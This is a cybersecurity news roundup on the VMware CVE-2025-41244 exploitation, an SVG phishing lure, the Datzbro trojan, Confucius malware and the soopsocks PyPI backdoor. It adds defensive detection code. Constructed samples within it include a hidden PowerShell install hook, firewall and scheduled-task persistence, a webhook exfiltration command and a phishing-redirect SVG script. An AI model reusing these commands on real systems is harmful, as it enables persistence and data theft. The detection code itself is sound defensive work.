VMware Exploit Attacks, AI Phishing Alert, Android Trojan Hijack – Cybersecurity News [September 29, 2025]

by DuoCircle

It was a busy week for cybersecurity threats. Attackers exploited a flaw in VMware software that gives them root-level control inside a virtual machine. Meanwhile, Microsoft flagged a phishing campaign that used AI-written code in fake file-sharing emails to trick victims. A new Android Trojan, Datzbro, spread through fake senior community apps, letting criminals take over phones. To top it off, the Confucius group launched fresh phishing attacks, and researchers found a malicious Python package that quietly installed a backdoor on Windows systems.

VMware Zero Day Exploited in Attacks by UNC5174 Group

A security flaw in VMware Tools and VMware Aria Operations, tracked as CVE-2025-41244, has been actively exploited in the wild since at least October 2024. Rated 7.8 (high) on the CVSS scale, it is a local privilege escalation: an attacker with ordinary, unprivileged access inside a virtual machine can gain full root privileges on that guest. The vulnerability affects a range of VMware products, including Cloud Foundation, vSphere Foundation, Telco Cloud, and various versions of VMware Tools for both Windows and Linux. VMware has released updates to address the problem, and Linux distributions are also preparing fixes for the open-vm-tools package they ship.

Researchers at NVISO Labs found the exploit during an incident response engagement. The flaw lies in how the software's service-discovery component identifies running processes in order to collect their version information. A coding oversight lets it match process binaries with an overly broad pattern, so an attacker only needs to place a binary with a matching name in a world-writable temporary directory and trick the service, which runs with elevated privileges, into executing it as root. That gives the attacker complete control inside the virtual machine. The attacks have been attributed to a threat group tracked as UNC5174, which has a track record of exploiting bugs in enterprise software.
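
The following is an added example, not VMware's script or NVISO's code, that models the bug class described above: a root-running collector that decides which process binaries to probe for a version string. The regex, the trusted-directory list and the process table are constructed for illustration. The "broad" policy accepts any path that ends in a service name, so a binary dropped in `/tmp` qualifies; the hardened policy also requires a canonical path under a root-owned system directory, root ownership, and no group/other write bit.

```python
import posixpath
import re
import stat
from typing import Callable, List, Sequence, Tuple

# Constructed analogue of the bug class described above. This is NOT VMware's
# script: the regex, the trusted-directory list and the process table are
# illustrative choices made for this example.

# A broad pattern: any absolute path whose last component is a service name.
# "/tmp/httpd" satisfies it exactly as "/usr/sbin/httpd" does.
BROAD_PATTERN = re.compile(r"^/\S+/(httpd|sshd|mysqld|nginx)$")

# Hardened policy: only binaries under root-owned system directories.
TRUSTED_DIRS = ("/usr/sbin", "/usr/bin", "/sbin", "/bin", "/usr/libexec")

Process = Tuple[str, int, int]   # (executable path, owner uid, permission bits)


def broad_is_candidate(exe_path: str, owner_uid: int = 0, mode: int = 0) -> bool:
    """Vulnerable check: trusts the file name alone and ignores where the file
    lives or who owns it. owner_uid/mode exist only for a uniform signature."""
    return BROAD_PATTERN.match(exe_path) is not None


def hardened_is_candidate(exe_path: str, owner_uid: int, mode: int) -> bool:
    """Hardened check: service name AND trusted directory AND root-owned AND
    not writable by group/others. Ownership and mode are passed in so the
    policy can be exercised against a constructed process table offline."""
    if BROAD_PATTERN.match(exe_path) is None:
        return False
    canonical = posixpath.normpath(exe_path)     # "/usr/sbin/../../tmp/x" -> "/tmp/x"
    if not any(canonical.startswith(d + "/") for d in TRUSTED_DIRS):
        return False
    if owner_uid != 0:
        return False
    if mode & (stat.S_IWGRP | stat.S_IWOTH):
        return False
    return True


def hardened_is_candidate_on_disk(exe_path: str) -> bool:
    """Same policy against the live filesystem; lstat so a symlink planted in
    a trusted directory is not silently followed to an untrusted target."""
    import os
    try:
        st = os.lstat(exe_path)
    except OSError:
        return False
    if not stat.S_ISREG(st.st_mode):
        return False
    return hardened_is_candidate(exe_path, st.st_uid, stat.S_IMODE(st.st_mode))


# Constructed process table, as a root-running discovery service might build
# it from /proc. The third and fourth entries model an attacker's binaries.
SAMPLE_PROCESSES: List[Process] = [
    ("/usr/sbin/httpd", 0, 0o755),
    ("/usr/sbin/sshd", 0, 0o755),
    ("/tmp/httpd", 1000, 0o755),                    # dropped by an unprivileged user
    ("/usr/sbin/../../tmp/mysqld", 1000, 0o755),    # trusted-looking prefix, untrusted target
    ("/usr/sbin/nginx", 0, 0o777),                  # world-writable: must not run as root
]


def planned_commands(processes: Sequence[Process],
                     policy: Callable[[str, int, int], bool]) -> List[List[str]]:
    """The version-probe commands a root collector would run under `policy`.
    They are returned, never executed, so the attack path can be inspected."""
    return [[exe, "--version"] for exe, uid, mode in processes if policy(exe, uid, mode)]


if __name__ == "__main__":
    for name, policy in (("broad", broad_is_candidate), ("hardened", hardened_is_candidate)):
        print(name, planned_commands(SAMPLE_PROCESSES, policy))
```

Under the broad policy all five entries are probed, including `/tmp/httpd --version` as root; the hardened policy leaves only the two root-owned binaries under `/usr/sbin`. The on-disk variant is what a real collector would call; the pure-function form exists so the policy can be unit-tested without privileges.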


Microsoft Flags AI-Generated Code in New Phishing Attack

Microsoft has flagged a phishing campaign, spotted in late August, in which the attackers appear to have used AI to write the code in their malicious files. It shows how criminals are starting to use large language models to make their lures more convincing and harder to detect. It started with emails sent from compromised business accounts that looked like everyday file-sharing notifications carrying a PDF attachment. The attachment was actually an SVG file, a format that can carry embedded script, with the malicious code hidden inside.

Anyone who opened the file was redirected to a fake login page, complete with a fake CAPTCHA to make it look legitimate. What stood out was the code itself: it was written to look like a business analytics dashboard, using terms like "revenue" and "operations" to disguise its purpose. Microsoft assesses that this overly detailed, structured style is a likely sign that an AI model wrote it. The campaign was small and was shut down quickly, but it is part of a growing trend of AI being used to produce obfuscated code that can fool both people and security tools.
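
As an added example (not Microsoft's sample or any code from the campaign), here is a small attachment triage check for the lure described above: an attachment named as a PDF whose bytes are really an SVG carrying active content. The sample attachment is constructed, and the "analytics" vocabulary in it only mimics the disguise the write-up describes. The check flags the extension/content mismatch, then walks the SVG for `<script>` and `<foreignObject>` elements, `on*` event handlers, and `javascript:` links.

```python
import xml.etree.ElementTree as ET
from typing import List

# Constructed sample (not the campaign's file): an attachment named as a PDF
# whose bytes are an SVG with an onload handler, an embedded script and a
# javascript: link, dressed up with "dashboard" vocabulary.
SAMPLE_NAME = "Q3_Report_Shared.pdf"
SAMPLE_BYTES = b"""<?xml version="1.0"?>
<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink"
     width="600" height="400" onload="dashboard_init()">
  <text x="20" y="40">Quarterly revenue and operations overview</text>
  <script><![CDATA[
    var operations = ["revenue", "operations", "growth"];
    function dashboard_init() { window.location = "https://example.invalid/login"; }
  ]]></script>
  <a xlink:href="javascript:dashboard_init()">
    <rect width="600" height="400" fill="none"/>
  </a>
</svg>
"""

# Elements that let an SVG execute script or embed arbitrary HTML.
ACTIVE_ELEMENTS = {"script", "foreignobject"}


def local_name(qualified: str) -> str:
    """Strip the {namespace} prefix ElementTree puts on tags and attributes."""
    return qualified.rsplit("}", 1)[-1].lower()


def analyse_attachment(name: str, data: bytes) -> List[str]:
    """Return human-readable findings for one attachment. An empty list means
    none of these checks observed anything suspicious."""
    findings: List[str] = []
    if name.lower().endswith(".pdf") and not data.lstrip().startswith(b"%PDF-"):
        findings.append("named .pdf but content has no %PDF- header")
    try:
        root = ET.fromstring(data)
    except ET.ParseError:
        return findings                      # not XML; nothing more these checks can say
    if local_name(root.tag) != "svg":
        return findings
    findings.append("content is SVG")
    for el in root.iter():
        tag = local_name(el.tag)
        if tag in ACTIVE_ELEMENTS:
            findings.append(f"active element <{tag}>")
        for attr, value in el.attrib.items():
            a = local_name(attr)
            if a.startswith("on"):
                findings.append(f"event handler {a} on <{tag}>")
            elif a == "href" and value.strip().lower().startswith("javascript:"):
                findings.append(f"javascript: link on <{tag}>")
    return findings


def should_quarantine(name: str, data: bytes) -> bool:
    """Block when the declared type lies or the SVG carries active content.
    A plain SVG logo yields only 'content is SVG' and is allowed through."""
    return any(f != "content is SVG" for f in analyse_attachment(name, data))


if __name__ == "__main__":
    for finding in analyse_attachment(SAMPLE_NAME, SAMPLE_BYTES):
        print("-", finding)
    print("quarantine:", should_quarantine(SAMPLE_NAME, SAMPLE_BYTES))
```

Checking the magic bytes against the declared extension catches the disguise before any parsing; the SVG walk is what separates a harmless inline logo from a file that will run code the moment a browser renders it.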


Android Trojan Exploits Social Groups to Hijack Devices

Security researchers have identified a new Android banking trojan, Datzbro, that spreads through fake social group apps aimed at senior citizens. The scam starts in social media groups promoting social events and trips for seniors. When a user expresses interest, they are contacted through messaging apps and sent links to download what they are told are registration apps for those activities. The fake apps carry names like "Senior Group," "Lively Years," and "ActiveSenior" to look legitimate.

Instead of community features, the apps install powerful malware. Datzbro can take complete control of a device: recording audio, taking pictures, stealing files, and logging keystrokes. By abusing accessibility permissions it can carry out transactions, steal banking information, and capture lock-screen PINs. One standout feature lets attackers mirror the victim's screen on their own system, making remote control easier while a black overlay hides their actions from the victim. Researchers also found hints that the operators are preparing to target iOS devices. Datzbro's blend of spying and financial fraud makes it a significant threat, and shows how easily trust and social connections can be exploited to put both devices and finances at risk.


Confucius Hackers Roll Out New Backdoor in Phishing Campaigns

The long-running hacking group Confucius is at it again, with new phishing campaigns targeting sensitive organisations across South Asia. Active since 2013, the group typically uses spear phishing and malicious documents to hit government, defence, and other critical sectors. Researchers spotted it in December 2024 using malicious PowerPoint files to deliver a data-harvesting malware called WooperStealer. By March 2025 it had switched to Windows shortcut (LNK) files to deliver the same malware, and by August it had changed again, using those shortcut files to deploy a new Python-based backdoor named Anondoor.

Once on a system, Anondoor lets the attackers collect system information, run commands, take screenshots, and lift browser passwords. Researchers note that Confucius is getting better at hiding its activity by layering obfuscation techniques and adapting its malware to new intelligence goals. The approach mirrors other groups in the region, such as Patchwork, which also reuses proven methods like malicious macros and shortcut files to deliver new and updated malware. It shows how these threat actors keep refining old tricks to stay effective.


Soopsocks Python Package Drops Windows Backdoor via PowerShell

Researchers recently found a malicious Python package on PyPI called soopsocks that posed as a tool for setting up a SOCKS5 proxy service. In reality it installed a Windows backdoor. Before it was removed, the package had been downloaded more than 2,600 times. On installation it ran hidden scripts that executed PowerShell commands, altered firewall rules, and attempted to gain higher privileges. It also collected system information and sent it to a hard-coded Discord webhook. For persistence, it registered itself as a service and created scheduled tasks so it would restart after a reboot.
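
As an added example, not the soopsocks package itself or any vendor's scanner, the following script reviews an extracted source distribution for the combination described above: a setup-time hook plus post-install behaviours such as hidden PowerShell, firewall changes, elevation, scheduled tasks and a Discord webhook. The sample package contents are constructed to mimic those behaviours in miniature (its `PAYLOAD` name is deliberately undefined; the text is only scanned, never executed), and the indicator regexes are this example's own choices.

```python
import re
from typing import Dict, List, Tuple

# Constructed sample of an extracted sdist. It is NOT the soopsocks package;
# it only reproduces, in miniature, the behaviours the write-up describes.
# PAYLOAD is deliberately undefined: this text is scanned, never executed.
SAMPLE_PACKAGE: Dict[str, str] = {
    "setup.py": '''
from setuptools import setup
from setuptools.command.install import install
import subprocess

class PostInstall(install):
    def run(self):
        install.run(self)
        subprocess.Popen(["powershell.exe", "-WindowStyle", "Hidden",
                          "-EncodedCommand", PAYLOAD])

setup(name="example-socks5", version="0.1", cmdclass={"install": PostInstall})
''',
    "example_socks5/persist.ps1": r'''
netsh advfirewall firewall add rule name="svc" dir=in action=allow program="$env:TEMP\svc.exe"
Start-Process -FilePath "$env:TEMP\svc.exe" -Verb RunAs
schtasks /create /tn "svc" /tr "$env:TEMP\svc.exe" /sc onlogon
Invoke-RestMethod -Uri "https://discord.com/api/webhooks/000/abc" -Method Post -Body $sysinfo
''',
    "example_socks5/__init__.py": "def version():\n    return '0.1'\n",
}

# (label, regex). Each regex is applied to the raw file text.
INDICATORS: List[Tuple[str, str]] = [
    ("install-time hook", r"cmdclass\s*=\s*\{[^}]*['\"](install|develop|egg_info)['\"]"),
    ("powershell invocation", r"(?i)\bpowershell(\.exe)?\b"),
    ("hidden or encoded command", r"(?i)-(WindowStyle\s+Hidden|EncodedCommand|enc\b)"),
    ("firewall change", r"(?i)netsh\s+advfirewall|New-NetFirewallRule"),
    ("privilege elevation", r"(?i)-Verb\s+RunAs"),
    ("scheduled task", r"(?i)schtasks\s+/create|Register-ScheduledTask"),
    ("discord webhook", r"(?i)https://discord(app)?\.com/api/webhooks/"),
    ("service install", r"(?i)\bsc(\.exe)?\s+create\b|New-Service\b"),
]

POST_INSTALL_LABELS = {"powershell invocation", "hidden or encoded command", "firewall change",
                       "privilege elevation", "scheduled task", "discord webhook", "service install"}


def scan_package(files: Dict[str, str]) -> Dict[str, List[str]]:
    """Map each file that trips at least one indicator to its labels, in INDICATORS order."""
    report: Dict[str, List[str]] = {}
    for path, text in files.items():
        hits = [label for label, pattern in INDICATORS if re.search(pattern, text)]
        if hits:
            report[path] = hits
    return report


def should_block(report: Dict[str, List[str]]) -> bool:
    """Block when the package both hooks installation and carries any of the
    post-install behaviours: that pairing means the payload runs the moment
    `pip install` finishes, before anything is ever imported."""
    labels = {label for hits in report.values() for label in hits}
    return "install-time hook" in labels and bool(labels & POST_INSTALL_LABELS)


if __name__ == "__main__":
    report = scan_package(SAMPLE_PACKAGE)
    for path, hits in report.items():
        print(f"{path}: {', '.join(hits)}")
    print("verdict:", "BLOCK" if should_block(report) else "allow")
```

The install-hook check matters most: a `cmdclass` override of `install` runs arbitrary code during `pip install`, so anything it launches needs no user action beyond installing the package. Pattern matching like this is a triage aid, not a proof of safety; a package that passes still deserves a look at what its hook actually does.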

The discovery comes as software supply chain security draws growing attention. In response to similar threats, GitHub is tightening its policies for npm tokens, and security vendors are rolling out tools that block malicious packages automatically. The soopsocks incident is another clear example of attackers weaponizing open source platforms by hiding malware inside seemingly useful tools.
